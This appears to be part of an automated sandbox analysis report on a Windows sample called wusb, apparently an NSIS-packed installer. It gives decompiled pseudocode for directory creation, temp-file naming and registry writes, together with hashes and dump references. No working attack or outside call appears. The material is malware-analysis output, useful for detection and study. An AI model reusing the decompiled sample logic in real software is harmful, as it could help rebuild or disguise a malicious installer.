                                                        0x00000000
                                                        0x0040324e
                                                        0x00403238
                                                        0x00403277
                                                        0x00000000
                                                        0x00403277
                                                        0x00000000
                                                        0x00403181

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CountTick$wsprintf
                                                        • String ID: ... %d%%
                                                        • API String ID: 551687249-2449383134
                                                        • Opcode ID: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                        • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                                        • Opcode Fuzzy Hash: ec08b81ccf01a23b3f2095c025c940c6288906fc183749b0f6cb8fc1ea750618
                                                        • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040577F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 760 40577f-4057ca CreateDirectoryW 761 4057d0-4057dd GetLastError 760->761 762 4057cc-4057ce 760->762 763 4057f7-4057f9 761->763 764 4057df-4057f3 SetFileSecurityW 761->764 762->763 764->762 765 4057f5 GetLastError 764->765 765->763
                                                        C-Code - Quality: 100%
                                                        			E0040577F(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f0;
				_v36.Group = 0x4083f0;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e0;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                        0x0040578a
                                                        0x0040578e
                                                        0x00405791
                                                        0x00405797
                                                        0x0040579b
                                                        0x0040579f
                                                        0x004057a7
                                                        0x004057ae
                                                        0x004057b4
                                                        0x004057bb
                                                        0x004057c2
                                                        0x004057ca
                                                        0x004057cc
                                                        0x00000000
                                                        0x004057cc
                                                        0x004057d6
                                                        0x004057dd
                                                        0x004057f3
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004057f5
                                                        0x004057f9

                                                        APIs
                                                        • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                        • GetLastError.KERNEL32 ref: 004057D6
                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                                        • GetLastError.KERNEL32 ref: 004057F5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                        • String ID: C:\Users\Public
                                                        • API String ID: 3449924974-2272764151
                                                        • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                        • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                                        • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                        • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405D6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 766 405d6d-405d79 767 405d7a-405dae GetTickCount GetTempFileNameW 766->767 768 405db0-405db2 767->768 769 405dbd-405dbf 767->769 768->767 770 405db4 768->770 771 405db7-405dba 769->771 770->771
                                                        C-Code - Quality: 100%
                                                        			E00405D6D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a55c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                        0x00405d73
                                                        0x00405d79
                                                        0x00405d7a
                                                        0x00405d7a
                                                        0x00405d7f
                                                        0x00405d80
                                                        0x00405d83
                                                        0x00405d88
                                                        0x00405d8b
                                                        0x00405d95
                                                        0x00405da2
                                                        0x00405da6
                                                        0x00405dae
                                                        0x00000000
                                                        0x00000000
                                                        0x00405db2
                                                        0x00000000
                                                        0x00405db4
                                                        0x00405db4
                                                        0x00405db4
                                                        0x00405db7
                                                        0x00405dba
                                                        0x00405dba
                                                        0x00405dbd
                                                        0x00000000

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00405D8B
                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\Public\wusb.bat" ,0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,766DFAA0,00403589), ref: 00405DA6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CountFileNameTempTick
                                                        • String ID: "C:\Users\Public\wusb.bat" $C:\Users\user\AppData\Local\Temp\$nsa
                                                        • API String ID: 1716503409-1078228756
                                                        • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                        • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                                        • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                        • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 772 10001759-10001795 call 10001b18 776 100018a6-100018a8 772->776 777 1000179b-1000179f 772->777 778 100017a1-100017a7 call 10002286 777->778 779 100017a8-100017b5 call 100022d0 777->779 778->779 784 100017e5-100017ec 779->784 785 100017b7-100017bc 779->785 786 1000180c-10001810 784->786 787 100017ee-1000180a call 100024a4 call 100015b4 call 10001272 GlobalFree 784->787 788 100017d7-100017da 785->788 789 100017be-100017bf 785->789 790 10001812-1000184c call 100015b4 call 100024a4 786->790 791 1000184e-10001854 call 100024a4 786->791 812 10001855-10001859 787->812 788->784 792 100017dc-100017dd call 10002b57 788->792 794 100017c1-100017c2 789->794 795 100017c7-100017c8 call 1000289c 789->795 790->812 791->812 806 100017e2 792->806 800 100017c4-100017c5 794->800 801 100017cf-100017d5 call 10002640 794->801 803 100017cd 795->803 800->784 800->795 811 100017e4 801->811 803->806 806->811 811->784 815 10001896-1000189d 812->815 816 1000185b-10001869 call 10002467 812->816 815->776 819 1000189f-100018a0 GlobalFree 815->819 822 10001881-10001888 816->822 823 1000186b-1000186e 816->823 819->776 822->815 824 1000188a-10001895 call 1000153d 822->824 823->822 825 10001870-10001878 823->825 824->815 825->822 826 1000187a-1000187b FreeLibrary 825->826 826->822
                                                        C-Code - Quality: 92%
                                                        			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A4(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A4(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A4(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E10002467(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B57(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000289C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002640(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

















                                                        0x10001759
                                                        0x10001759
                                                        0x10001759
                                                        0x10001763
                                                        0x1000176b
                                                        0x10001778
                                                        0x10001786
                                                        0x10001789
                                                        0x1000178b
                                                        0x10001790
                                                        0x10001795
                                                        0x100018a8
                                                        0x100018a8
                                                        0x1000179b
                                                        0x1000179f
                                                        0x100017a2
                                                        0x100017a7
                                                        0x100017a8
                                                        0x100017a9
                                                        0x100017af
                                                        0x100017b5
                                                        0x100017e5
                                                        0x100017ec
                                                        0x10001810
                                                        0x1000184f
                                                        0x10001812
                                                        0x10001812
                                                        0x10001813
                                                        0x10001816
                                                        0x1000181c
                                                        0x10001820
                                                        0x10001823
                                                        0x10001828
                                                        0x10001828
                                                        0x1000182f
                                                        0x10001835
                                                        0x1000183b
                                                        0x10001847
                                                        0x10001848
                                                        0x1000184b
                                                        0x100017ee
                                                        0x100017ef
                                                        0x10001804
                                                        0x10001804
                                                        0x10001859
                                                        0x1000185c
                                                        0x10001869
                                                        0x10001870
                                                        0x10001878
                                                        0x1000187b
                                                        0x1000187b
                                                        0x10001878
                                                        0x10001888
                                                        0x10001890
                                                        0x10001895
                                                        0x10001888
                                                        0x1000189d
                                                        0x00000000
                                                        0x1000189f
                                                        0x00000000
                                                        0x100018a0
                                                        0x1000189d
                                                        0x100017b9
                                                        0x100017bc
                                                        0x100017da
                                                        0x00000000
                                                        0x00000000
                                                        0x100017dd
                                                        0x100017e2
                                                        0x100017e2
                                                        0x100017e4
                                                        0x00000000
                                                        0x100017e4
                                                        0x100017be
                                                        0x100017bf
                                                        0x100017c7
                                                        0x100017c8
                                                        0x00000000
                                                        0x100017c8
                                                        0x100017c1
                                                        0x100017c2
                                                        0x100017d0
                                                        0x00000000
                                                        0x100017d0
                                                        0x100017c5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x100017c5

                                                        APIs
                                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D83
                                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D88
                                                          • Part of subcall function 10001B18: GlobalFree.KERNEL32 ref: 10001D8D
                                                        • GlobalFree.KERNEL32 ref: 10001804
                                                        • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                        • GlobalFree.KERNEL32 ref: 100018A0
                                                          • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8
                                                          • Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2
                                                          • Part of subcall function 100015B4: lstrcpyW.KERNEL32 ref: 100015CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.677589038.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.677505776.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677602813.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677619149.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_wusb.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$Alloc$Librarylstrcpy
                                                        • String ID:
                                                        • API String ID: 1791698881-3916222277
                                                        • Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                        • Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
                                                        • Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
                                                        • Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 83%
                                                        			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				int _t30;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x18));
				_t34 = __eax;
				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
				 *(_t39 - 0x3c) = E00402C37(2);
				_t20 = E00402C37(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402C37(0x23);
						_t24 = lstrlenW(0x40b5a8) + _t29 + 2;
					}
					if(_t37 == 4) {
						 *0x40b5a8 = E00402C15(3);
						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004030FA( *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5a8, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5a8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x42a2a8 =  *0x42a2a8 +  *(_t39 - 4);
				return 0;
			}













                                                        0x004023de
                                                        0x004023de
                                                        0x004023de
                                                        0x004023e1
                                                        0x004023e8
                                                        0x004023f2
                                                        0x004023f5
                                                        0x004023fe
                                                        0x00402405
                                                        0x0040240c
                                                        0x0040240f
                                                        0x00402415
                                                        0x0040241f
                                                        0x00402423
                                                        0x0040242e
                                                        0x0040242e
                                                        0x00402435
                                                        0x0040243f
                                                        0x00402445
                                                        0x00402448
                                                        0x00402448
                                                        0x0040244c
                                                        0x00402458
                                                        0x00402458
                                                        0x00402469
                                                        0x00402471
                                                        0x00402473
                                                        0x00402473
                                                        0x00402476
                                                        0x00402551
                                                        0x00402551
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
                                                        • lstrlenW.KERNEL32(Finishs,00000023,00000011,00000002), ref: 00402429
                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,Finishs,00000000,00000011,00000002), ref: 00402469
                                                        • RegCloseKey.ADVAPI32(?,?,?,Finishs,00000000,00000011,00000002), ref: 00402551
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CloseValuelstrlen
                                                        • String ID: Finishs
                                                        • API String ID: 2655323295-3355420458
                                                        • Opcode ID: f9d37ecf99ac56edafcaa2f1cd47f4937662206fa3ab36d745cd74ad20f42250
                                                        • Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
                                                        • Opcode Fuzzy Hash: f9d37ecf99ac56edafcaa2f1cd47f4937662206fa3ab36d745cd74ad20f42250
                                                        • Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 1000289C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 156fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNELBASE(00000000), ref: 1000295B
                                                        • GetLastError.KERNEL32 ref: 10002A62
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.677589038.0000000010001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000002.00000002.677505776.0000000010000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677602813.0000000010003000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        • Associated: 00000002.00000002.677619149.0000000010005000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_10000000_wusb.jbxd
                                                        Similarity
                                                        • API ID: CreateErrorFileLast
                                                        • String ID: @Mhv
                                                        • API String ID: 1214770103-3595611156
                                                        • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                        • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                                        • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                                        • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C37(0xfffffff0);
				_t17 = E00405BC8(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405B4A(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E004057FC( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E00405819(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E0040577F( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040624C(L"C:\\Users\\alfons\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                                                        0x004015c1
                                                        0x004015c9
                                                        0x004015cc
                                                        0x004015d1
                                                        0x004015d5
                                                        0x004015d7
                                                        0x004015df
                                                        0x004015e1
                                                        0x004015e4
                                                        0x004015ea
                                                        0x00401604
                                                        0x00401607
                                                        0x004015ec
                                                        0x004015ec
                                                        0x004015ef
                                                        0x00000000
                                                        0x004015fa
                                                        0x004015fd
                                                        0x004015fd
                                                        0x004015ef
                                                        0x0040160e
                                                        0x00401615
                                                        0x00401624
                                                        0x00401624
                                                        0x00401617
                                                        0x0040161a
                                                        0x00401622
                                                        0x00000000
                                                        0x00000000
                                                        0x00401622
                                                        0x00401615
                                                        0x00401627
                                                        0x0040162b
                                                        0x0040162c
                                                        0x004015d7
                                                        0x00401634
                                                        0x00401663
                                                        0x00402245
                                                        0x00401636
                                                        0x00401638
                                                        0x00401645
                                                        0x0040164d
                                                        0x00401655
                                                        0x0040165b
                                                        0x0040165b
                                                        0x00401655
                                                        0x00402ac2
                                                        0x00402ace

                                                        APIs
